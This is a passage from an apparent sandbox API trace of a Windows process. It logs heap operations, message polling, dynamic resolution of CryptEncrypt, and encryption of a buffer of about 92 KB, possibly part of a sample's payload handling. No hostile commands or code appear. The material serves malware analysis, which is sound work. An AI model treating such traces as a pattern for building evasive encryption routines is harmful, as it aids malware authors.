Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0223.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0223.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0223.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0223.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e514a8 [0223.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.209] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0223.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0223.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f760 [0223.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0223.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0223.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0223.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0223.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0223.210] CryptEncrypt (in: hKey=0xa873d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x166f1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x166f8) returned 1 [0223.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0223.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0223.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0223.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0223.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0223.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0223.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0223.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0223.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0223.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0223.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.212] CharLowerBuffW (in: lpsz="byte[91896]", cchLength=0xb | out: lpsz="byte[91896]") returned 0xb [0223.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.215] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0223.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.216] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.218] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51520, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0223.218] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0223.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f440 [0223.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0223.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0223.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0223.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0223.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0223.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0223.219] CryptEncrypt (in: hKey=0xa873d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ead130*, pdwDataLen=0x8cef60*=0x166f1, dwBufLen=0x166f8 | out: pbData=0x2ead130*, pdwDataLen=0x8cef60*=0x166f8) returned 1 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0223.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0223.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0223.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0223.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0223.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0223.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0223.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0223.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0223.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0223.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0223.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0223.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0223.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0223.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0223.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0223.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0223.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0223.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0223.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0223.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.229] RtlAllocateHeap 